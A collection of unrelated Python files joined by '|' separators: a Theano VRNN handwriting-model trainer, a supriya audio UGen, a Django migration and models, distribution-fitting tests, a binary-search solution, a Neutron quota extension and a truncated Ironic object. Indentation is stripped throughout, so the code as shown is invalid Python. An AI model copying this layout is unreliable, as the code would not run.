sys.path.append("/Users/iorife/github/Investigaciones/nnet/VRNN_nips2015")
sys.path.append("/Users/iorife/github/Investigaciones/")
from nnet.VRNN_nips2015.cle.cle.cost import BiGauss, KLGaussianGaussian
from nnet.VRNN_nips2015.cle.cle.data import Iterator
from nnet.VRNN_nips2015.cle.cle.models import Model
from nnet.VRNN_nips2015.cle.cle.layers import InitCell
from nnet.VRNN_nips2015.cle.cle.layers.feedforward import FullyConnectedLayer
from nnet.VRNN_nips2015.cle.cle.layers.recurrent import LSTM
from nnet.VRNN_nips2015.cle.cle.train import Training
from nnet.VRNN_nips2015.cle.cle.train.ext import (
EpochCount,
GradientClipping,
Monitoring,
Picklize,
EarlyStopping,
WeightNorm
)
from nnet.VRNN_nips2015.cle.cle.train.opt import Adam
from nnet.VRNN_nips2015.cle.cle.utils import init_tparams, sharedX
from nnet.VRNN_nips2015.cle.cle.utils.compat import OrderedDict
from nnet.VRNN_nips2015.cle.cle.utils.op import Gaussian_sample
from nnet.VRNN_nips2015.cle.cle.utils.gpu_op import concatenate
from nnet.VRNN_nips2015.datasets.iamondb import IAMOnDB
def main(args):
trial = int(args['trial'])
pkl_name = 'vrnn_gauss_%d' % trial
channel_name = 'valid_nll_upper_bound'
data_path = args['data_path']
save_path = args['save_path']
monitoring_freq = int(args['monitoring_freq'])
epoch = int(args['epoch'])
batch_size = int(args['batch_size'])
x_dim = int(args['x_dim'])
z_dim = int(args['z_dim'])
rnn_dim = int(args['rnn_dim'])
lr = float(args['lr'])
debug = int(args['debug'])
print("trial no. %d" % trial)
print("batch size %d" % batch_size)
print("learning rate %f" % lr)
print("saving pkl file '%s'" % pkl_name)
print("to the save path '%s'" % save_path)
q_z_dim = 150
p_z_dim = 150
p_x_dim = 250
x2s_dim = 250
z2s_dim = 150
target_dim = (x_dim-1)
model = Model()
train_data = IAMOnDB(name='train',
prep='normalize',
cond=False,
path=data_path)
X_mean = train_data.X_mean
X_std = train_data.X_std
valid_data = IAMOnDB(name='valid',
prep='normalize',
cond=False,
path=data_path,
X_mean=X_mean,
X_std=X_std)
init_W = InitCell('rand')
init_U = InitCell('ortho')
init_b = InitCell('zeros')
init_b_sig = InitCell('const', mean=0.6)
x, mask = train_data.theano_vars()
if debug:
x.tag.test_value = np.zeros((15, batch_size, x_dim), dtype=np.float32)
temp = np.ones((15, batch_size), dtype=np.float32)
temp[:, -2:] = 0.
mask.tag.test_value = temp
x_1 = FullyConnectedLayer(name='x_1',
parent=['x_t'],
parent_dim=[x_dim],
nout=x2s_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
z_1 = FullyConnectedLayer(name='z_1',
parent=['z_t'],
parent_dim=[z_dim],
nout=z2s_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
rnn = LSTM(name='rnn',
parent=['x_1', 'z_1'],
parent_dim=[x2s_dim, z2s_dim],
nout=rnn_dim,
unit='tanh',
init_W=init_W,
init_U=init_U,
init_b=init_b)
phi_1 = FullyConnectedLayer(name='phi_1',
parent=['x_1', 's_tm1'],
parent_dim=[x2s_dim, rnn_dim],
nout=q_z_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
phi_mu = FullyConnectedLayer(name='phi_mu',
parent=['phi_1'],
parent_dim=[q_z_dim],
nout=z_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
phi_sig = FullyConnectedLayer(name='phi_sig',
parent=['phi_1'],
parent_dim=[q_z_dim],
nout=z_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
prior_1 = FullyConnectedLayer(name='prior_1',
parent=['s_tm1'],
parent_dim=[rnn_dim],
nout=p_z_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
prior_mu = FullyConnectedLayer(name='prior_mu',
parent=['prior_1'],
parent_dim=[p_z_dim],
nout=z_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
prior_sig = FullyConnectedLayer(name='prior_sig',
parent=['prior_1'],
parent_dim=[p_z_dim],
nout=z_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
theta_1 = FullyConnectedLayer(name='theta_1',
parent=['z_1', 's_tm1'],
parent_dim=[z2s_dim, rnn_dim],
nout=p_x_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
theta_mu = FullyConnectedLayer(name='theta_mu',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=target_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
theta_sig = FullyConnectedLayer(name='theta_sig',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=target_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
corr = FullyConnectedLayer(name='corr',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=1,
unit='tanh',
init_W=init_W,
init_b=init_b)
binary = FullyConnectedLayer(name='binary',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=1,
unit='sigmoid',
init_W=init_W,
init_b=init_b)
nodes = [rnn,
x_1, z_1,
phi_1, phi_mu, phi_sig,
prior_1, prior_mu, prior_sig,
theta_1, theta_mu, theta_sig, corr, binary]
params = OrderedDict()
for node in nodes:
if node.initialize() is not None:
params.update(node.initialize())
params = init_tparams(params)
s_0 = rnn.get_init_state(batch_size)
x_1_temp = x_1.fprop([x], params)
def inner_fn(x_t, s_tm1):
phi_1_t = phi_1.fprop([x_t, s_tm1], params)
phi_mu_t = phi_mu.fprop([phi_1_t], params)
phi_sig_t = phi_sig.fprop([phi_1_t], params)
prior_1_t = prior_1.fprop([s_tm1], params)
prior_mu_t = prior_mu.fprop([prior_1_t], params)
prior_sig_t = prior_sig.fprop([prior_1_t], params)
z_t = Gaussian_sample(phi_mu_t, phi_sig_t)
z_1_t = z_1.fprop([z_t], params)
s_t = rnn.fprop([[x_t, z_1_t], [s_tm1]], params)
return s_t, phi_mu_t, phi_sig_t, prior_mu_t, prior_sig_t, z_1_t
((s_temp, phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp, z_1_temp), updates) =\
theano.scan(fn=inner_fn,
sequences=[x_1_temp],
outputs_info=[s_0, None, None, None, None, None])
for k, v in updates.iteritems():
k.default_update = v
s_temp = concatenate([s_0[None, :, :], s_temp[:-1]], axis=0)
theta_1_temp = theta_1.fprop([z_1_temp, s_temp], params)
theta_mu_temp = theta_mu.fprop([theta_1_temp], params)
theta_sig_temp = theta_sig.fprop([theta_1_temp], params)
corr_temp = corr.fprop([theta_1_temp], params)
binary_temp = binary.fprop([theta_1_temp], params)
kl_temp = KLGaussianGaussian(phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp)
x_shape = x.shape
x_in = x.reshape((x_shape[0]*x_shape[1], -1))
theta_mu_in = theta_mu_temp.reshape((x_shape[0]*x_shape[1], -1))
theta_sig_in = theta_sig_temp.reshape((x_shape[0]*x_shape[1], -1))
corr_in = corr_temp.reshape((x_shape[0]*x_shape[1], -1))
binary_in = binary_temp.reshape((x_shape[0]*x_shape[1], -1))
recon = BiGauss(x_in, theta_mu_in, theta_sig_in, corr_in, binary_in)
recon = recon.reshape((x_shape[0], x_shape[1]))
recon = recon * mask
recon_term = recon.sum(axis=0).mean()
recon_term.name = 'recon_term'
kl_temp = kl_temp * mask
kl_term = kl_temp.sum(axis=0).mean()
kl_term.name = 'kl_term'
nll_upper_bound = recon_term + kl_term
nll_upper_bound.name = 'nll_upper_bound'
max_x = x.max()
mean_x = x.mean()
min_x = x.min()
max_x.name = 'max_x'
mean_x.name = 'mean_x'
min_x.name = 'min_x'
max_theta_mu = theta_mu_in.max()
mean_theta_mu = theta_mu_in.mean()
min_theta_mu = theta_mu_in.min()
max_theta_mu.name = 'max_theta_mu'
mean_theta_mu.name = 'mean_theta_mu'
min_theta_mu.name = 'min_theta_mu'
max_theta_sig = theta_sig_in.max()
mean_theta_sig = theta_sig_in.mean()
min_theta_sig = theta_sig_in.min()
max_theta_sig.name = 'max_theta_sig'
mean_theta_sig.name = 'mean_theta_sig'
min_theta_sig.name = 'min_theta_sig'
max_phi_sig = phi_sig_temp.max()
mean_phi_sig = phi_sig_temp.mean()
min_phi_sig = phi_sig_temp.min()
max_phi_sig.name = 'max_phi_sig'
mean_phi_sig.name = 'mean_phi_sig'
min_phi_sig.name = 'min_phi_sig'
max_prior_sig = prior_sig_temp.max()
mean_prior_sig = prior_sig_temp.mean()
min_prior_sig = prior_sig_temp.min()
max_prior_sig.name = 'max_prior_sig'
mean_prior_sig.name = 'mean_prior_sig'
min_prior_sig.name = 'min_prior_sig'
model.inputs = [x, mask]
model.params = params
model.nodes = nodes
optimizer = Adam(
lr=lr
)
extension = [
GradientClipping(batch_size=batch_size),
EpochCount(epoch),
Monitoring(freq=monitoring_freq,
ddout=[nll_upper_bound, recon_term, kl_term,
max_phi_sig, mean_phi_sig, min_phi_sig,
max_prior_sig, mean_prior_sig, min_prior_sig,
max_theta_sig, mean_theta_sig, min_theta_sig,
max_x, mean_x, min_x,
max_theta_mu, mean_theta_mu, min_theta_mu],
data=[Iterator(valid_data, batch_size)]),
Picklize(freq=monitoring_freq, path=save_path),
EarlyStopping(freq=monitoring_freq, path=save_path, channel=channel_name),
WeightNorm()
]
mainloop = Training(
name=pkl_name,
data=Iterator(train_data, batch_size),
model=model,
optimizer=optimizer,
cost=nll_upper_bound,
outputs=[nll_upper_bound],
extension=extension
)
mainloop.run()
if __name__ == "__main__":
import sys, time
if len(sys.argv) > 1:
config_file_name = sys.argv[-1]
else:
config_file_name = 'config.txt'
f = open(config_file_name, 'r')
lines = f.readlines()
params = OrderedDict()
for line in lines:
line = line.split('\n')[0]
param_list = line.split(' ')
param_name = param_list[0]
param_value = param_list[1]
params[param_name] = param_value
main(params)
|
# -*- encoding: utf-8 -*-
from supriya.tools.ugentools.UGen import UGen
class PeakFollower(UGen):
r'''Tracks peak signal amplitude.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = 'Trigger Utility UGens'
__slots__ = ()
_ordered_input_names = (
'source',
'decay',
)
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
decay=0.999,
source=None,
):
UGen.__init__(
self,
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
decay=0.999,
source=None,
):
r'''Constructs an audio-rate PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
return ugen
@classmethod
def kr(
cls,
decay=0.999,
source=None,
):
r'''Constructs a control-rate PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.kr(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
return ugen
### PUBLIC PROPERTIES ###
@property
def decay(self):
r'''Gets `decay` input of PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower.decay
0.999
Returns ugen input.
'''
index = self._ordered_input_names.index('decay')
return self._inputs[index]
@property
def source(self):
r'''Gets `source` input of PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
'''
index = self._ordered_input_names.index('source')
return self._inputs[index]
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Shop.city'
db.add_column(u'shop_shop', 'city',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='city_charity', null=True, to=orm['city.City']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Shop.city'
db.delete_column(u'shop_shop', 'city_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'city.city': {
'Meta': {'object_name': 'City'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'play.player': {
'Meta': {'object_name': 'Player'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'city'", 'null': 'True', 'to': u"orm['city.City']"}),
'experience': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '5', 'decimal_places': '0'}),
'facebook_pic': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '4', 'decimal_places': '0'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/avatar-1.png'", 'max_length': '400', 'null': 'True'}),
'score': ('django.db.models.fields.DecimalField', [], {'default': '20', 'null': 'True', 'max_digits': '4', 'decimal_places': '0'}),
'token': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'shop.coupon': {
'Meta': {'object_name': 'Coupon'},
'buyers': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': u"orm['play.Player']", 'null': 'True', 'symmetrical': 'False'}),
'coupons_released': ('django.db.models.fields.DecimalField', [], {'default': '10', 'max_digits': '4', 'decimal_places': '0'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '500', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/stanford.png'", 'max_length': '200', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Shop']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
u'shop.shop': {
'Meta': {'object_name': 'Shop'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'city_charity'", 'null': 'True', 'to': u"orm['city.City']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/stanford.png'", 'max_length': '200', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Super shop!'", 'max_length': '100', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['shop']
|
#!/usr/bin/env python3
#title : tests.py
#description : Contains testing methods for the various functions.
#author : Enys Mones
#date : 2015.06.21
#version : 0.1
#usage : python tests.py
#=========================================================================
import numpy as np
from mpmath import exp
from core import utils
from distributions import distribution as dist
from calculation import fit
from calculation import measures as me
from calculation.model_selection import print_pmfs
def test_sampling(distribution):
"""
Tests sampling method for a given distribution.
During the test, this method generates samples from the specific distribution.
Results of the test are written in a file called 'TEST-SAMPLING.CSV', which contains the
theoretical and actual distributions.
:param distribution: distribution to test.
"""
print("TESTING: sampling for %s distribution" % distribution)
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" input parameters: %s" % dist.get_params(params, distribution))
print(" creating pdf")
test_pmf = dist.pmf(distribution, params)
print(" generating samples")
test_sample_pmf = dist.get_sample_pmf(dist.samples(distribution, params))
test_distribution = []
for i in range(len(test_pmf)):
if i < len(test_sample_pmf):
test_distribution.append([i, test_pmf[i], test_sample_pmf[i]])
else:
test_distribution.append([i, test_pmf[i], 0.0])
test_output = 'TEST-SAMPLE.CSV'
print(" printing results in %s" % test_output)
utils.print_csv(test_output, ['value', 'probability', 'relative_frequency'], test_distribution)
def test_fit_mle(distribution):
"""
Tests MLE fit of a given distribution.
The test generates samples for all distributions and then performs MLE fit of the specified
distribution. Should test robustness of MLE calculations and precision of fit on a sample from
its own distribution.
:param distribution: distribution to test.
"""
print("TESTING: MLE fit for %s distribution" % distribution.upper())
print(" fitting to others")
for sample_dist in dist.get():
print(" %s" % sample_dist.upper())
params = dist.DISTRIBUTIONS[sample_dist][dist.KEY_TEST_PARAMS]
test_sample = dist.samples(sample_dist, params)
fit_result = fit.fit_mle(distribution, test_sample)
print(" input parameters: %s" % dist.get_params(params, sample_dist))
print(" fit parameters: %s" % dist.get_params(fit_result['params'], distribution))
print(" log-likelihood: %r" % fit_result['log-likelihood'])
print(" K-S statistics: %r" % fit_result['D'])
def test_fit_ks(distribution):
"""
Tests K-S fit of a given distribution.
The test generates samples for all distributions and then performs K-S fit of the specified
distribution. Should test robustness of K-S calculations and precision of fit on a sample from
its own distribution.
:param distribution: distribution to test.
"""
print("TESTING: K-S fit for %s distribution" % distribution.upper())
print(" fitting to others")
for sample_dist in dist.get():
print(" %s" % sample_dist.upper())
params = dist.DISTRIBUTIONS[sample_dist][dist.KEY_TEST_PARAMS]
test_sample = dist.samples(sample_dist, params)
fit_results = fit.fit_ks(distribution, test_sample)
print(" input parameters: %s" % dist.get_params(params, sample_dist))
print(" fit parameters: %s" % dist.get_params(fit_results['params'], distribution))
print(" log-likelihood: %r" % fit_results['log-likelihood'])
print(" K-S statistics: %r" % fit_results['D'])
def test_aic_ms(distribution):
"""
Tests AIC model selection.
During the test, this method generates a sample with the specified distribution and then
calculates AIC for all other distributions (including the tested one). Finally, these are
compared and the one with the largest AIC weight is chosen.
:param distribution:
:return:
"""
print("TESTING: AIC model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating AIC for all distributions")
fit_results = {}
aic = {}
for d in dist.get():
fit_results[d] = fit.fit_mle(d, test_sample)
aic[d] = me.aic_measure(dist.log_likelihood(d, fit_results[d]['params'], test_sample, nonzero_only=True),
len(fit_results[d]['params']))
delta_aic = {d: aic[d]-min(aic.values()) for d in aic}
weights = {d: float(exp(-delta_aic[d]/2)) for d in delta_aic}
best_model = dist.get()[0]
print(" input parameters: %s" % dist.get_params(params, distribution))
for d in dist.get():
if weights[d] > weights[best_model]:
best_model = d
weights[d] /= sum(weights.values())
print(" %s:" % d.upper())
print(" %s" % dist.get_params(fit_results[d]['params'], d))
print(" AIC = %.0f" % aic[d])
print(" dAIC = %.0f" % delta_aic[d])
print(" w = %r" % weights[d])
print(" Most likely model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-AIC.CSV')
def test_bic_ms(distribution):
"""
Tests BIC model selection.
During the test, this method generates a sample with the specified distribution and then
calculates BIC for all other distributions (including the tested one). Finally, these are
compared and the one with the largest BIC weight is chosen.
:param distribution:
:return:
"""
print("TESTING: BIC model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating BIC for all distributions")
fit_results = {}
bic = {}
for d in dist.get():
fit_results[d] = fit.fit_mle(d, test_sample)
bic[d] = me.bic_measure(dist.log_likelihood(d, fit_results[d]['params'], test_sample, nonzero_only=True),
len(fit_results[d]['params']), len(test_sample))
delta_bic = {d: bic[d]-min(bic.values()) for d in bic}
weights = {d: float(exp(-delta_bic[d]/2)) for d in delta_bic}
best_model = dist.get()[0]
print(" input parameters: %s" % dist.get_params(params, distribution))
for d in dist.get():
if weights[d] > weights[best_model]:
best_model = d
weights[d] /= sum(weights.values())
print(" %s:" % d.upper())
print(" %s" % dist.get_params(fit_results[d]['params'], d))
print(" BIC = %.0f" % bic[d])
print(" dBIC = %.0f" % delta_bic[d])
print(" w = %r" % weights[d])
print(" Most likely model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-BIC.CSV')
def test_ks_ms(distribution):
"""
Tests K-S model selection.
During the test, this method generates a sample with the specified distribution and then
calculates K-S statistics for all other distributions (including the tested one). Finally, these are
compared and the one with the lowest K-S weight is chosen.
:param distribution:
:return:
"""
print("TESTING: K-S model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating K-S statistics for all distributions")
print(" input parameters: %s" % dist.get_params(params, distribution))
fit_results = {}
best_ksd = 1.0
best_model = dist.get()[0]
for d in dist.get():
print(" %s:" % d.upper())
fit_results[d] = fit.fit_ks(d, test_sample)
if fit_results[d]['D'] < best_ksd:
best_ksd = fit_results[d]['D']
best_model = d
print(" %s" % dist.get_params(fit_results[d]['params'], d))
print(" D = %r" % fit_results[d]['D'])
params = fit_results[d]['params']
p = 0
for r in range(100):
synthetic_sample = dist.samples(d, params, len(test_sample))
ksd = me.ks_statistics(dist.get_sample_cdf(synthetic_sample), dist.cdf(d, params, np.max(synthetic_sample)))
if ksd > fit_results[d]['D']:
p += 1
print(" p = %r" % (float(p)/100.0))
print(" Best fitting model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-KS.CSV')
|
from django.db import models
class ModelRun(models.Model):
user = models.CharField(max_length=50)
created = models.DateTimeField(auto_now_add=True)
edited = models.TextField()
class RunScript(models.Model):
class Meta:
get_latest_by = 'version'
user = models.CharField(max_length=50)
created = models.DateTimeField(auto_now_add=True)
edited = models.TextField()
name = models.CharField(max_length=100)
version = models.IntegerField()
run = models.CharField(max_length=100)
class DiagnosticConfig(models.Model):
class Meta:
get_latest_by = 'version'
# The user that created the diagnostic configuration
user = models.CharField(max_length=50)
# The time the config was created
created = models.DateTimeField(auto_now_add=True)
# The version number
version = models.IntegerField(default=1)
# The set of diagnostic sets, comma delimited
diag_set = models.CharField(max_length=100, default='')
# The path to the obs data
obs_path = models.CharField(max_length=200, default='')
# The path to the model data
model_path = models.CharField(max_length=200, default='')
# The output data path
output_path = models.CharField(max_length=200, default='')
# The run config name
name = models.CharField(max_length=100, default='default')
# The set of authorized users
allowed_users = models.TextField()
# Diagnostic package
package = models.CharField(max_length=50, default='AMWG')
|
import bisect
class Solution:
def searchInsert_brute_forces(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
for id, n in enumerate(nums):
if n >= target:
return id
return len(nums)
def searchInsert_std_lib(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
return bisect.bisect_left(nums, target)
def searchInsert(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
l = 0
r = len(nums) - 1
while l <= r:
mid = (l + r) // 2
if nums[mid] == target:
return mid
elif nums[mid] > target:
r = mid - 1
else:
l = mid + 1
return l
if __name__ == '__main__':
assert 2 == Solution().searchInsert([1, 3, 5, 6], 5)
assert 1 == Solution().searchInsert([1, 3, 5, 6], 2)
assert 4 == Solution().searchInsert([1, 3, 5, 6], 7)
assert 0 == Solution().searchInsert([1, 3, 5, 6], 0)
assert 0 == Solution().searchInsert([1], 1)
|
# Copyright 2017 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource
from neutron.extensions import quotasv2
from neutron.quota import resource_registry
DETAIL_QUOTAS_ACTION = 'details'
RESOURCE_NAME = 'quota'
ALIAS = RESOURCE_NAME + '_' + DETAIL_QUOTAS_ACTION
QUOTA_DRIVER = cfg.CONF.QUOTAS.quota_driver
RESOURCE_COLLECTION = RESOURCE_NAME + "s"
DB_QUOTA_DRIVER = 'neutron.db.quota.driver.DbQuotaDriver'
EXTENDED_ATTRIBUTES_2_0 = {
RESOURCE_COLLECTION: {}
}
class DetailQuotaSetsController(quotasv2.QuotaSetsController):
def _get_detailed_quotas(self, request, tenant_id):
return self._driver.get_detailed_tenant_quotas(
request.context,
resource_registry.get_all_resources(), tenant_id)
def details(self, request, id):
if id != request.context.project_id:
# Check if admin
if not request.context.is_admin:
reason = _("Only admin is authorized to access quotas for"
" another tenant")
raise n_exc.AdminRequired(reason=reason)
return {self._resource_name:
self._get_detailed_quotas(request, id)}
class Quotasv2_detail(api_extensions.ExtensionDescriptor):
"""Quota details management support."""
# Ensure new extension is not loaded with old conf driver.
extensions.register_custom_supported_check(
ALIAS, lambda: True if QUOTA_DRIVER == DB_QUOTA_DRIVER else False,
plugin_agnostic=True)
@classmethod
def get_name(cls):
return "Quota details management support"
@classmethod
def get_alias(cls):
return ALIAS
@classmethod
def get_description(cls):
return 'Expose functions for quotas usage statistics per project'
@classmethod
def get_updated(cls):
return "2017-02-10T10:00:00-00:00"
@classmethod
def get_resources(cls):
"""Returns Extension Resources."""
controller = resource.Resource(
DetailQuotaSetsController(directory.get_plugin()),
faults=faults.FAULT_MAP)
return [extensions.ResourceExtension(
RESOURCE_COLLECTION,
controller,
member_actions={'details': 'GET'},
collection_actions={'tenant': 'GET'})]
def get_extended_resources(self, version):
return EXTENDED_ATTRIBUTES_2_0 if version == "2.0" else {}
def get_required_extensions(self):
return ["quotas"]
|
# Copyright (c) 2016 Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import strutils
from oslo_utils import uuidutils
from oslo_versionedobjects import base as object_base
from ironic.common import exception
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import fields as object_fields
from ironic.objects import notification
@base.IronicObjectRegistry.register
class VolumeTarget(base.IronicObject,
object_base.VersionedObjectDictCompat):
# Version 1.0: Initial version
VERSION = '1.0'
dbapi = db_api.get_instance()
